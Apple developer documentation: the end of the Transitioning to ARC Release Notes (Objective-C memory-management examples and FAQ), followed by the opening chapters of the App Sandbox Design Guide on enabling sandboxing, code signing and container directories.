The patterns for declaring outlets in iOS and OS X change with ARC and become consistent across both platforms. The pattern you should typically adopt is: outlets should be weak, except for those from File’s Owner to top-level objects in a nib file (or a storyboard scene), which should be strong.

Full details are given in “Nib Files” in Resource Programming Guide.

Stack Variables Are Initialized with nil

Using ARC, strong, weak, and autoreleasing stack variables are now implicitly initialized with nil. For example:

    - (void)myMethod {
        NSString *name;
        NSLog(@"name: %@", name);
    }

will log null for the value of name rather than perhaps crashing.

Use Compiler Flags to Enable and Disable ARC

You enable ARC using a new -fobjc-arc compiler flag. You can also choose to use ARC on a per-file basis if it’s more convenient for you to use manual reference counting for some files. For projects that employ ARC as the default approach, you can disable ARC for a specific file using a new -fno-objc-arc compiler flag for that file.

ARC is supported in Xcode 4.2 and later, for OS X v10.6 and later (64-bit applications) and for iOS 4 and later. Weak references are not supported in OS X v10.6 and iOS 4. There is no ARC support in Xcode 4.1 and earlier.

Managing Toll-Free Bridging

In many Cocoa applications, you need to use Core Foundation-style objects, whether from the Core Foundation framework itself (such as CFArrayRef or CFMutableDictionaryRef) or from frameworks that adopt Core Foundation conventions such as Core Graphics (you might use types like CGColorSpaceRef and CGGradientRef).
The compiler does not automatically manage the lifetimes of Core Foundation objects; you must call CFRetain and CFRelease (or the corresponding type-specific variants) as dictated by the Core Foundation memory management rules (see Memory Management Programming Guide for Core Foundation).

If you cast between Objective-C and Core Foundation-style objects, you need to tell the compiler about the ownership semantics of the object using either a cast (defined in objc/runtime.h) or a Core Foundation-style macro (defined in NSObject.h):

● __bridge transfers a pointer between Objective-C and Core Foundation with no transfer of ownership.
● __bridge_retained or CFBridgingRetain casts an Objective-C pointer to a Core Foundation pointer and also transfers ownership to you.
You are responsible for calling CFRelease or a related function to relinquish ownership of the object.
● __bridge_transfer or CFBridgingRelease moves a non-Objective-C pointer to Objective-C and also transfers ownership to ARC.
ARC is responsible for relinquishing ownership of the object.

For example, if you had code like this:

    - (void)logFirstNameOfPerson:(ABRecordRef)person {
        NSString *name = (NSString *)ABRecordCopyValue(person, kABPersonFirstNameProperty);
        NSLog(@"Person's first name: %@", name);
        [name release];
    }

you could replace it with:

    - (void)logFirstNameOfPerson:(ABRecordRef)person {
        NSString *name = (NSString *)CFBridgingRelease(ABRecordCopyValue(person, kABPersonFirstNameProperty));
        NSLog(@"Person's first name: %@", name);
    }

The Compiler Handles CF Objects Returned From Cocoa Methods

The compiler understands that Objective-C methods that return Core Foundation types follow the historical Cocoa naming conventions (see Advanced Memory Management Programming Guide). For example, the compiler knows that, in iOS, the CGColor returned by the CGColor method of UIColor is not owned.
You must still use an appropriate type cast, as illustrated by this example:

    NSMutableArray *colors = [NSMutableArray arrayWithObject:(id)[[UIColor darkGrayColor] CGColor]];
    [colors addObject:(id)[[UIColor lightGrayColor] CGColor]];

Cast Function Parameters Using Ownership Keywords

When you cast between Objective-C and Core Foundation objects in function calls, you need to tell the compiler about the ownership semantics of the passed object. The ownership rules for Core Foundation objects are those specified in the Core Foundation memory management rules (see Memory Management Programming Guide for Core Foundation); rules for Objective-C objects are specified in Advanced Memory Management Programming Guide.

In the following code fragment, the array passed to the CGGradientCreateWithColors function requires an appropriate cast. Ownership of the array is not passed to the function, so the cast is __bridge.

    NSArray *colors = <#An array of colors#>;
    CGGradientRef gradient = CGGradientCreateWithColors(colorSpace, (__bridge CFArrayRef)colors, locations);

The code fragment is shown in context in the following method implementation. Notice also the use of Core Foundation memory management functions where dictated by the Core Foundation memory management rules.

    - (void)drawRect:(CGRect)rect {
        CGContextRef ctx = UIGraphicsGetCurrentContext();
        CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceGray();
        CGFloat locations[2] = {0.0, 1.0};
        NSMutableArray *colors = [NSMutableArray arrayWithObject:(id)[[UIColor darkGrayColor] CGColor]];
        [colors addObject:(id)[[UIColor lightGrayColor] CGColor]];
        CGGradientRef gradient = CGGradientCreateWithColors(colorSpace, (__bridge CFArrayRef)colors, locations);
        CGColorSpaceRelease(colorSpace); // Release owned Core Foundation object.
        CGPoint startPoint = CGPointMake(0.0, 0.0);
        CGPoint endPoint = CGPointMake(CGRectGetMaxX(self.bounds), CGRectGetMaxY(self.bounds));
        CGContextDrawLinearGradient(ctx, gradient, startPoint, endPoint,
            kCGGradientDrawsBeforeStartLocation | kCGGradientDrawsAfterEndLocation);
        CGGradientRelease(gradient); // Release owned Core Foundation object.
    }

Common Issues While Converting a Project

When migrating existing projects, you are likely to run into various issues. Here are some common issues, together with solutions.

You can’t invoke retain, release, or autorelease.

This is a feature. You also can’t write:

    while ([x retainCount]) { [x release]; }

You can’t invoke dealloc.

You typically invoke dealloc if you are implementing a singleton or replacing an object in an init method. For singletons, use the shared instance pattern. In init methods, you don't have to call dealloc anymore, because the object will be freed when you overwrite self.

You can’t use NSAutoreleasePool objects.

Use the new @autoreleasepool{} construct instead. This forces a block structure on your autorelease pool, and is about six times faster than NSAutoreleasePool. @autoreleasepool even works in non-ARC code. Because @autoreleasepool is so much faster than NSAutoreleasePool, many old “performance hacks” can simply be replaced with unconditional @autoreleasepool.

The migrator handles simple uses of NSAutoreleasePool, but it can't handle complex conditional cases, or cases where a variable is defined inside the body of the new @autoreleasepool and used after it.

ARC requires you to assign the result of [super init] to self in init methods.

The following is invalid in ARC init methods:

    [super init];

The simple fix is to change it to:

    self = [super init];

The proper fix is to do that, and check the result for nil before continuing:

    self = [super init];
    if (self) {
        ...
You can’t implement custom retain or release methods.

Implementing custom retain or release methods breaks weak pointers. There are several common reasons for wanting to provide custom implementations:

● Performance.
Please don’t do this any more; the implementation of retain and release for NSObject is much faster now. If you still find problems, please file bugs.
● To implement a custom weak pointer system.
Use __weak instead.
● To implement a singleton class.
Use the shared instance pattern instead. Alternatively, use class instead of instance methods, which avoids having to allocate the object at all.

“Assigned” instance variables become strong.

Before ARC, instance variables were non-owning references: directly assigning an object to an instance variable did not extend the lifetime of the object. To make a property strong, you usually implemented or synthesized accessor methods that invoked appropriate memory management methods; in contrast, you may have implemented accessor methods like those shown in the following example to maintain a weak property.

    @interface MyClass : Superclass {
        id thing; // Weak reference.
    }
    // ...
    @end

    @implementation MyClass
    - (id)thing {
        return thing;
    }
    - (void)setThing:(id)newThing {
        thing = newThing;
    }
    // ...
    @end

With ARC, instance variables are strong references by default: assigning an object to an instance variable directly does extend the lifetime of the object. The migration tool is not able to determine when an instance variable is intended to be weak. To maintain the same behavior as before, you must mark the instance variable as being weak, or use a declared property.

    @interface MyClass : Superclass {
        id __weak thing;
    }
    // ...
    @end

    @implementation MyClass
    - (id)thing {
        return thing;
    }
    - (void)setThing:(id)newThing {
        thing = newThing;
    }
    // ...
    @end

Or:

    @interface MyClass : Superclass
    @property (weak) id thing;
    // ...
    @end

    @implementation MyClass
    @synthesize thing;
    // ...
    @end

You can't use strong ids in C structures.

For example, the following code won’t compile:

    struct X { id x; float y; };

This is because x defaults to strongly retained and the compiler can’t safely synthesize all the code required to make it work correctly. For example, if you pass a pointer to one of these structures through some code that ends up doing a free, each id would have to be released before the struct is freed. The compiler cannot reliably do this, so strong ids in structures are disallowed completely in ARC mode. There are a few possible solutions:

1. Use Objective-C objects instead of structs.
This is considered to be best practice anyway.
2. If using Objective-C objects is sub-optimal (maybe you want a dense array of these structs), then consider using a void * instead.
This requires the use of the explicit casts, described below.
3. Mark the object reference as __unsafe_unretained.
This approach may be useful for semi-common patterns like this:

    struct x { NSString *S; int X; } StaticArray[] = {
        @"foo", 42,
        @"bar", 97,
        ...
    };

You declare the structure as:

    struct x { NSString * __unsafe_unretained S; int X; };

This may be problematic and is unsafe if the object could be released out from under the pointer, but it is very useful for things that are known to be around forever, like constant string literals.

You can’t directly cast between id and void * (including Core Foundation types).

This is discussed in greater detail in “Managing Toll-Free Bridging” (page 12).

Frequently Asked Questions

How do I think about ARC? Where does it put the retains/releases?

Try to stop thinking about where the retain/release calls are put and think about your application algorithms instead. Think about “strong and weak” pointers in your objects, about object ownership, and about possible retain cycles.

Do I still need to write dealloc methods for my objects?

Maybe. Because ARC does not automate malloc/free, management of the lifetime of Core Foundation objects, file descriptors, and so on, you still free such resources by writing a dealloc method.

You do not have to (indeed cannot) release instance variables, but you may need to invoke [self setDelegate:nil] on system classes and other code that isn’t compiled using ARC.

dealloc methods in ARC do not require, or allow, a call to [super dealloc]; the chaining to super is handled and enforced by the compiler.

Are retain cycles still possible in ARC?

Yes. ARC automates retain/release, and inherits the issue of retain cycles. Fortunately, code migrated to ARC rarely starts leaking, because properties already declare whether they are retaining or not.

How do blocks work in ARC?

Blocks “just work” when you pass blocks up the stack in ARC mode, such as in a return. You don’t have to call Block_copy any more. You still need to use [^{} copy] when passing “down” the stack into arrayWithObjects: and other methods that do a retain.

The one thing to be aware of is that NSString * __block myString is retained in ARC mode, not a possibly dangling pointer. To get the previous behavior, use __block NSString * __unsafe_unretained myString or (better still) use __block NSString * __weak myString.

Can I develop applications for OS X with ARC using Snow Leopard?

No. The Snow Leopard version of Xcode 4.2 doesn’t support ARC at all on OS X, because it doesn’t include the 10.7 SDK.
Xcode 4.2 for Snow Leopard does support ARC for iOS though, and Xcode 4.2 for Lion supports both OS X and iOS. This means you need a Lion system to build an ARC application that runs on Snow Leopard.

Can I create a C array of retained pointers under ARC?

Yes, you can, as illustrated by this example:

    // Note calloc() to get zero-filled memory.
    __strong SomeClass **dynamicArray = (__strong SomeClass **)calloc(entries, sizeof(SomeClass *));
    for (int i = 0; i < entries; i++) {
        dynamicArray[i] = [[SomeClass alloc] init];
    }

    // When you're done, set each entry to nil to tell ARC to release the object.
    for (int i = 0; i < entries; i++) {
        dynamicArray[i] = nil;
    }
    free(dynamicArray);

There are a number of aspects to note:

● You will need to write __strong SomeClass ** in some cases, because the default is __autoreleasing SomeClass **.
● The allocated memory must be zero-filled.
● You must set each element to nil before freeing the array (memset or bzero will not work).
● You should avoid memcpy or realloc.

Is ARC slow?

It depends on what you’re measuring, but generally “no.” The compiler efficiently eliminates many extraneous retain/release calls, and much effort has been invested in speeding up the Objective-C runtime in general. In particular, the common “return a retain/autoreleased object” pattern is much faster and does not actually put the object into the autorelease pool when the caller of the method is ARC code.

One issue to be aware of is that the optimizer is not run in common debug configurations, so expect to see a lot more retain/release traffic at -O0 than at -Os.

Does ARC work in ObjC++ mode?

Yes. You can even put strong/weak ids in classes and containers. The ARC compiler synthesizes retain/release logic in copy constructors, destructors, and so on to make this work.

Which classes don’t support weak references?
You cannot currently create weak references to instances of the following classes:

NSATSTypesetter, NSColorSpace, NSFont, NSMenuView, NSParagraphStyle, NSSimpleHorizontalTypesetter, and NSTextView.

Note: In addition, in OS X v10.7, you cannot create weak references to instances of NSFontManager, NSFontPanel, NSImage, NSTableCellView, NSViewController, NSWindow, and NSWindowController. In addition, in OS X v10.7 no classes in the AV Foundation framework support weak references.

For declared properties, you should use assign instead of weak; for variables you should use __unsafe_unretained instead of __weak.

In addition, you cannot create weak references from instances of NSHashTable, NSMapTable, or NSPointerArray under ARC.

What do I have to do when subclassing NSCell or another class that uses NSCopyObject?

Nothing special. ARC takes care of cases where you had to previously add extra retains explicitly. With ARC, all copy methods should just copy over the instance variables.

Can I opt out of ARC for specific files?

Yes. When you migrate a project to use ARC, the -fobjc-arc compiler flag is set as the default for all Objective-C source files. You can disable ARC for a specific class using the -fno-objc-arc compiler flag for that class. In Xcode, in the target Build Phases tab, open the Compile Sources group to reveal the source file list. Double-click the file for which you want to set the flag, enter -fno-objc-arc in the pop-up panel, then click Done.

Is GC (Garbage Collection) deprecated on the Mac?

Garbage collection is deprecated in OS X Mountain Lion v10.8, and will be removed in a future version of OS X. Automatic Reference Counting is the recommended replacement technology.
To aid in migrating existing applications, the ARC migration tool in Xcode 4.3 and later supports migration of garbage collected OS X applications to ARC.

Note: For apps targeting the Mac App Store, Apple strongly recommends you replace garbage collection with ARC as soon as feasible, because Mac App Store guidelines (see App Store Review Guidelines for Mac Apps) prohibit the use of deprecated technologies.

Document Revision History

This table describes the changes to Transitioning to ARC Release Notes.

Date        Notes
2012-07-17  Updated for OS X v10.8.
2012-03-14  Noted that under ARC properties are strong by default.
2012-02-16  Corrected out-of-date advice regarding C++ integration.
2012-01-09  Added note to search for weak references.
2011-10-12  First version of a document that describes how to transition code from manual retain/release to use ARC.

Apple Inc.
© 2012 Apple Inc. All rights reserved.

No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice.

No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers.

Apple Inc.
1 Infinite Loop
Cupertino, CA 95014
408-996-1010

Apple, the Apple logo, Cocoa, Leopard, Mac, Objective-C, OS X, Snow Leopard, and Xcode are trademarks of Apple Inc., registered in the U.S. and other countries.

App Store and Mac App Store are service marks of Apple Inc.

iOS is a trademark or registered trademark of Cisco in the U.S. and other countries and is used under license.

Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. AS A RESULT, THIS DOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY.

IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages.

THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty.

Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state.
App Sandbox Design Guide

Contents

About App Sandbox
    At a Glance
    How to Use This Document
    Prerequisites
    See Also
App Sandbox Quick Start
    Create the Xcode Project
    Enable App Sandbox
    Create a Code Signing Certificate for Testing
    Specify the Code Signing Identity
    Confirm That the App Is Sandboxed
    Resolve an App Sandbox Violation
App Sandbox in Depth
    The Need for a Last Line of Defense
    Container Directories and File System Access
        The App Sandbox Container Directory
        The Application Group Container Directory
        Powerbox and File System Access Outside of Your Container
        Open and Save Dialog Behavior with App Sandbox
    Entitlements and System Resource Access
    Security-Scoped Bookmarks and Persistent Resource Access
        Two Distinct Types of Security-Scoped Bookmark
        Using Security-Scoped Bookmarks
    App Sandbox and Code Signing
    External Tools, XPC Services, and Privilege Separation
Designing for App Sandbox
    Six Steps for Adopting App Sandbox
    Determine Whether Your App Is Suitable for Sandboxing
    Design a Development and Distribution Strategy
    Resolve API Incompatibilities
        Opening, Saving, and Tracking Documents
        Retaining Access to File System Resources
        Creating a Login Item for Your App
        Accessing User Data
        Accessing Preferences of Other Apps
    Apply the App Sandbox Entitlements You Need
    Add Privilege Separation Using XPC
    Implement a Migration Strategy
Migrating an App to a Sandbox
    Creating a Container Migration Manifest
    Undoing a Migration for Testing
    An Example Container Migration Manifest
    Use Variables to Specify Support-File Directories
Document Revision History

2012-09-19 | © 2012 Apple Inc. All Rights Reserved.
Tables and Listings

App Sandbox in Depth
    Table 2-1 The App Sandbox mindset
    Table 2-2 Open and Save class inheritance with App Sandbox
Migrating an App to a Sandbox
    Table 4-1 How system directory variables resolve depending on context
    Table 4-2 Variables for support-file directories
    Listing 4-1 An example container migration manifest

About App Sandbox

App Sandbox provides a last line of defense against stolen, corrupted, or deleted user data if malicious code exploits your app. App Sandbox also minimizes the damage from coding errors in your app or in frameworks you link against.

[Figure: Without App Sandbox, your app has unrestricted access to all system resources and all user data. With App Sandbox, your app has unrestricted access only within your sandbox and no access to other system resources or other user data.]

App Sandbox is an access control technology provided in OS X, enforced at the kernel level. Its strategy is twofold:

1. App Sandbox enables you to describe how your app interacts with the system. The system then grants your app the access it needs to get its job done, and no more.
2. App Sandbox allows the user to transparently grant your app additional access by way of Open and Save dialogs, drag and drop, and other familiar user interactions.

At a Glance

Based on simple security principles, App Sandbox provides strong defense against damage from malicious code. The elements of App Sandbox are container directories, entitlements, user-determined permissions, privilege separation, and kernel enforcement. It’s up to you to understand these elements and then to use your understanding to create a plan for adopting App Sandbox.

Relevant chapters: “App Sandbox Quick Start” (page 8), “App Sandbox in Depth” (page 15)

After you understand the basics, look at your app in light of this security technology. First, determine if your app is suitable for sandboxing. Most apps are.
Design your development strategy, resolve API incompatibilities, determine which entitlements you need, and consider applying privilege separation to maximize the defensive value of App Sandbox.

Relevant chapter: “Designing for App Sandbox”

Some file system locations that your app uses are different when you adopt App Sandbox. In particular, you gain a container directory to be used for app support files, databases, caches, and other files apart from user documents. OS X and Xcode support migration of files from their legacy locations to your container.

Relevant chapter: “Migrating an App to a Sandbox”

How to Use This Document

To get up and running with App Sandbox, perform the tutorial in “App Sandbox Quick Start”. Before sandboxing an app you intend to distribute, be sure you understand “App Sandbox in Depth”. When you’re ready to start sandboxing a new app, or to convert an existing app to adopt App Sandbox, read “Designing for App Sandbox”. If you’re providing a new, sandboxed version of your app to users already running a version that is not sandboxed, read “Migrating an App to a Sandbox”.

Prerequisites

Before you read this document, make sure you understand the place of App Sandbox and code signing in the overall OS X development process by reading Mac App Programming Guide.

See Also

To complement the damage containment provided by App Sandbox, you must provide a first line of defense by adopting secure coding practices throughout your app. To learn how, read Security Overview and Secure Coding Guide.

An important step in adopting App Sandbox is requesting entitlements for your app. For details on all the available entitlements, see Entitlement Key Reference.

You can enhance the benefits of App Sandbox in a full-featured app by implementing privilege separation.
You do this using XPC, an OS X implementation of interprocess communication. To learn the details of using XPC, read Daemons and Services Programming Guide.

App Sandbox Quick Start

In this Quick Start you get an OS X app up and running in a sandbox. You verify that the app is indeed sandboxed and then learn how to troubleshoot and resolve a typical App Sandbox error. The apps you use are Xcode, Keychain Access, Activity Monitor, and Console.

Create the Xcode Project

The app you create in this Quick Start uses a WebKit web view and consequently uses a network connection. Under App Sandbox, network connections don’t work unless you specifically allow them, which makes this a good example app for learning about sandboxing.

To create the Xcode project for this Quick Start

1. In Xcode 4, create a new Xcode project for an OS X Cocoa application.
   ● Name the project AppSandboxQuickStart.
   ● Set a company identifier, such as com.yourcompany, if none is already set.
   ● Ensure that Use Automatic Reference Counting is selected and that the other checkboxes are unselected.
2. In the project navigator, click the MainMenu nib file. The Interface Builder canvas appears.
3. In the Xcode dock, click the Window object. The app’s window is now visible on the canvas.
4. In the object library (in the utilities area), locate the WebView object.
5. Drag a web view onto the window on the canvas.
6. (Optional) To improve the display of the web view in the running app, perform the following steps:
   ● Drag the sizing controls on the web view so that it completely fills the window’s main view.
   ● Using the size inspector for the web view, ensure that all of the inner and outer autosizing constraints are active.
7. Create and connect an outlet for the web view in the AppDelegate class.
   In Xcode, use the following specification:

   Outlet connection source    The WebView object of the MainMenu nib file.
   Outlet variable location    The interface block of the AppDelegate.h header file.
   Outlet name                 webView
   Storage                     weak

   At this point, if you were to build the app, Xcode would report an error because the project doesn’t yet use WebKit but does have a web view in the nib file. You take care of this in the next step.
8. Add the WebKit framework to the app.
   ● Import the WebKit framework by adding the following statement above the interface block in the AppDelegate.h header file:

         #import <WebKit/WebKit.h>

   ● Link the WebKit framework to the Quick Start project as a required framework.
9. Add the following awakeFromNib method to the AppDelegate.m implementation file:

       - (void) awakeFromNib {
           // Ask the web view's main frame to load the specified URL.
           [self.webView.mainFrame loadRequest:
               [NSURLRequest requestWithURL:
                   [NSURL URLWithString: @"http://www.apple.com"]]];
       }

   On application launch, this method requests the specified URL from the computer’s network connection and then sends the result to the web view for display.

Now, build and run the app, which is not yet sandboxed and so has free access to system resources, including its network sockets. Confirm that the app’s window displays the page you specified in the awakeFromNib method. When done, quit the app.

Enable App Sandbox

You enable App Sandbox by selecting a checkbox in the Xcode target editor. In Xcode, click the project file in the project navigator and click the AppSandboxQuickStart target, if they’re not already selected. View the Summary tab of the target editor.

To enable App Sandbox for the project

1. In the Summary tab of the target editor, click Enable Entitlements.
   An entitlement is a key-value pair, defined in a property list file, that confers a specific capability or security permission to a target.
   When you click Enable Entitlements, Xcode automatically checks the Code Sign Application checkbox and the Enable App Sandboxing checkbox. Together, these are the essential project settings for enabling App Sandbox.
   When you click Enable Entitlements, Xcode also creates a .entitlements property list file, visible in the project navigator. As you use the graphical entitlements interface in the target editor, Xcode updates the property list file.
2. Clear the contents of the iCloud entitlement fields.
   This Quick Start doesn’t use iCloud. Because Xcode automatically adds iCloud entitlement values when you enable entitlements, delete them as follows:
   ● In the Summary tab of the target editor, select and then delete the content of the iCloud Key-Value Store field.
   ● Click the top row in the iCloud Containers field and click the minus button.

At this point in the Quick Start, you have enabled App Sandbox but have not yet provided a code signing identity for the Xcode project. Consequently, if you attempt to build the project now, the build fails. You take care of this in the next two sections.

Create a Code Signing Certificate for Testing

To build a sandboxed app in Xcode, you must have a code signing certificate and its associated private key in your keychain, and then use that certificate’s code signing identity in the project. The entitlements you specify, including the entitlement that enables App Sandbox, become part of the app’s code signature when you build the project.

In this section, you create a code signing certificate. This simplified process lets you stay focused on the steps for enabling a sandbox.

Important: A code signing certificate that you create as described in this Quick Start is not appropriate to use with an app you intend to distribute. Before you work on sandboxing an app you plan to distribute, read “App Sandbox and Code Signing”.
To create a code signing certificate for testing App Sandbox

1. In Keychain Access (available in Applications/Utilities), choose Keychain Access > Certificate Assistant > Create a Certificate. Certificate Assistant opens.
   Note: Before you invoke the “Create a Certificate” menu command, ensure that no key is selected in the Keychain Access main window. If a key is selected, the menu command is not available.
2. In Certificate Assistant, name the certificate something like My Test Certificate.
3. Complete the configuration of the certificate as follows:

   Identity type               Self Signed Root
   Certificate type            Code Signing
   Let me override defaults    unchecked

4. Click Create.
5. In the alert that appears, click Continue.
6. In the Conclusion window, click Done.

Your new code signing certificate, and its associated public and private keys, are now available in Keychain Access.

Specify the Code Signing Identity

Now, configure the Xcode project to use the code signing identity from the certificate you created in the previous task.

To specify the code signing identity for the project

1. View the Build Settings tab in the project editor. Take care that you are using the project editor, not the target editor.
2. In the Code Signing section, locate the Code Signing Identity row.
3. Click the value area of the Code Signing Identity row.
4. In the popup menu that opens, choose Other.
5. In the text entry window that opens, enter the exact name of the newly created code signing certificate, then press Return. If you’re using the suggested name from this Quick Start, the name you enter is My Test Certificate.

Now, build the app. The codesign tool may display an alert asking for permission to use the new certificate. If you do see this alert, click Always Allow.

Confirm That the App Is Sandboxed

Build and run the Quick Start app.
The window opens, but if the app is successfully sandboxed, no web content appears. This is because you have not yet conferred permission to access a network connection.

Apart from blocked behavior, there are two specific signs that an OS X app is successfully sandboxed.

To confirm that the Quick Start app is successfully sandboxed

1. In Finder, look at the contents of the ~/Library/Containers/ folder.
   If the Quick Start app is sandboxed, there is now a container folder named after your app. The name includes the company identifier for the project, so the complete folder name would be, for example, com.yourcompany.AppSandboxQuickStart.
   The system creates an app’s container folder, for a given user, the first time the user runs the app.
2. In Activity Monitor, check that the system recognizes the app as sandboxed.
   ● Launch Activity Monitor (available in /Applications/Utilities).
   ● In Activity Monitor, choose View > Columns. Ensure that the Sandbox menu item is checked.
   ● In the Sandbox column, confirm that the value for the Quick Start app is Yes.
   To make it easier to locate the app in Activity Monitor, enter the name of the Quick Start app in the Filter field.

Tip: If the app crashes when you attempt to run it, specifically by receiving an EXC_BAD_INSTRUCTION signal, the most likely reason is that you previously ran a sandboxed app with the same bundle identifier but a different code signature. This crashing upon launch is an App Sandbox security feature that prevents one app from masquerading as another and thereby gaining access to the other app’s container. You learn how to design and build your apps, in light of this security feature, in “App Sandbox and Code Signing”.

Resolve an App Sandbox Violation

An App Sandbox violation occurs if your app tries to do something that App Sandbox does not allow.
For example, you have already seen in this Quick Start that the sandboxed app is unable to retrieve content from the web. Fine-grained restriction over access to system resources is the heart of how App Sandbox provides protection should an app become compromised by malicious code.

The most common source of App Sandbox violations is a mismatch between the entitlement settings you specified in Xcode and the needs of your app. In this section you observe and then correct an App Sandbox violation.

To diagnose an App Sandbox violation

1. Build and run the Quick Start app.
   The app starts normally, but fails to display the webpage specified in its awakeFromNib method (as you’ve previously observed in “Confirm That the App Is Sandboxed”). Because displaying the webpage worked correctly before you sandboxed the app, it is appropriate in this case to suspect an App Sandbox violation.
2. Open Console (available in /Applications/Utilities/) and ensure that All Messages is selected in the sidebar.
   In the filter field of the Console window, enter sandboxd to display only App Sandbox violations. sandboxd is the name of the App Sandbox daemon that reports on sandbox violations. The relevant messages, as displayed in Console, look similar to the following:

       3:56:16 pm sandboxd: ([4928]) AppSandboxQuickS(4928) deny network-outbound 111.30.222.15:80
       3:56:16 pm sandboxd: ([4928]) AppSandboxQuickS(4928) deny system-socket

   The problem that generates these console messages is that the Quick Start app does not yet have the entitlement for outbound network access.

   Tip: To see the full backtraces for either violation, click the paperclip icon near the right edge of the corresponding Console message.

The steps in the previous task illustrate the general pattern to use for identifying App Sandbox violations:

1. Confirm that the violation occurs only with App Sandbox enabled in your project.
2. Provoke the violation (such as by attempting to use a network connection, if your app is designed to do that).
3. Look in Console for sandboxd messages.

There is also a simple, general pattern to use for resolving such violations.

To resolve the App Sandbox violation by adding the appropriate entitlement

1. Quit the Quick Start app.
2. In the Summary tab of the target editor, look for the entitlement that corresponds to the reported sandboxd violation.
   In this case, the primary error is deny network-outbound. The corresponding entitlement is Allow Outgoing Network Connections.
3. In the Summary tab of the target editor, select the Allow Outgoing Network Connections checkbox.
   Doing so applies a TRUE value, for the needed entitlement, to the Xcode project.
4. Build and run the app.
   The intended webpage now displays in the app. In addition, there are no new App Sandbox violation messages in Console.

App Sandbox in Depth

The access control mechanisms used by App Sandbox to protect user data are small in number and easy to understand. But the specific steps for you to take, as you adopt App Sandbox, are unique to your app. To determine what those steps are, you must understand the key concepts for this technology.

The Need for a Last Line of Defense

You secure your app against attack from malware by following the practices recommended in Secure Coding Guide. But despite your best efforts to build an invulnerable barrier (by avoiding buffer overflows and other memory corruptions, preventing exposure of user data, and eliminating other vulnerabilities), your app can be exploited by malicious code. An attacker needs only to find a single hole in your defenses, or in any of the frameworks and libraries that you link against, to gain control of your app’s interactions with the system.
App Sandbox is designed to confront this scenario head on by letting you describe your app’s intended interactions with the system. The system then grants your app only the access your app needs to get its job done. If malicious code gains control of a properly sandboxed app, it is left with access to only the files and resources in the app’s sandbox.

To successfully adopt App Sandbox, use a different mindset than you might be accustomed to, as suggested in Table 2-1.

Table 2-1 The App Sandbox mindset

When developing…                                When adopting App Sandbox…
Add features                                    Minimize system resource use
Take advantage of access throughout your app    Partition functionality, then distrust each part
Use the most convenient API                     Use the most secure API
View restrictions as limitations                View restrictions as safeguards

When designing for App Sandbox, you are planning for the following worst-case scenario: Despite your best efforts, malicious code breaches an unintended security hole, either in your code or in a framework you’ve linked against. Capabilities you’ve added to your app become capabilities of the hostile code. Keep this in mind as you read the rest of this document.

Container Directories and File System Access

When you adopt App Sandbox, the system provides a special directory, called a container, for use by your app and only by your app. Each user on a system gets an individual container for your app, within their home directory; your app has unfettered read/write access to the container for the current user.

The App Sandbox Container Directory

The container has the following characteristics:

● It is located at a system-defined path, within the user’s home directory, that you can obtain by calling the NSHomeDirectory function.
● Your app has unrestricted read/write access to the container and its subdirectories.
● OS X path-finding APIs (above the POSIX layer) refer to locations that are specific to your app.
  Most of these path-finding APIs refer to locations relative to your app’s container. For example, the container includes an individual Library directory (specified by the NSLibraryDirectory search path constant) for use only by your app, with individual Application Support and Preferences subdirectories.
  Using your container for support files requires no code change (from the pre-sandbox version of your app) but may require one-time migration, as explained in “Migrating an App to a Sandbox”.
  Some path-finding APIs (above the POSIX layer) refer to app-specific locations outside of the user’s home directory. In a sandboxed app, for example, the NSTemporaryDirectory function provides a path to a directory that is outside of the user’s home directory but specific to your app and within your sandbox; you have unrestricted read/write access to it for the current user. The behavior of these path-finding APIs is suitably adjusted for App Sandbox and no code change is needed.
● OS X establishes and enforces the connection between your app and its container by way of your app’s code signature.
● The container is in a hidden location, and so users do not interact with it directly. Specifically, the container is not for user documents. It is for files that your app uses, along with databases, caches, and other app-specific data.
  For a shoebox-style app, in which you provide the only user interface to the user’s content, that content goes in the container and your app has full access to it.

iOS Note: Because it is not for user documents, an OS X container differs from an iOS container, which, in iOS, is the one and only location for user documents. In addition, an iOS container contains the app itself. This is not so in OS X.

iCloud Note: Apple’s iCloud technology, as described in “iCloud Storage”, uses the name “container” as well.
There is no functional connection between an iCloud container and an App Sandbox container.

Thanks to code signing, no other sandboxed app can gain access to your container, even if it attempts to masquerade as your app by using your bundle identifier. Future versions of your app, however, do reuse your app’s container, provided that you use the same code signature and bundle identifier.

A container directory for an App Sandbox–enabled app is created when the app is first run. Because a container is within a user’s home folder, each user on a system gets their own container for your app. A given user’s container is created when that user first runs your app.

The Application Group Container Directory

In addition to per-app containers, beginning in OS X v10.7.4, an application can use entitlements to request access to a shared container that is common to multiple applications produced by the same development team. This container is intended for content that is not user-facing, such as shared caches or databases.

Applications that are members of an application group also gain the ability to share Mach and POSIX semaphores and to use certain other IPC mechanisms in conjunction with other group members.

These group containers are automatically created or added into each app’s sandbox container as determined by the existence of these keys, and are stored in ~/Library/Group Containers/<application-group-id>, where <application-group-id> can be whatever name you choose.

Your app can obtain the path to the group containers by calling the containerURLForSecurityApplicationGroupIdentifier: method of NSFileManager.

For more details, see “Adding an Application to an Application Group” in Entitlement Key Reference.

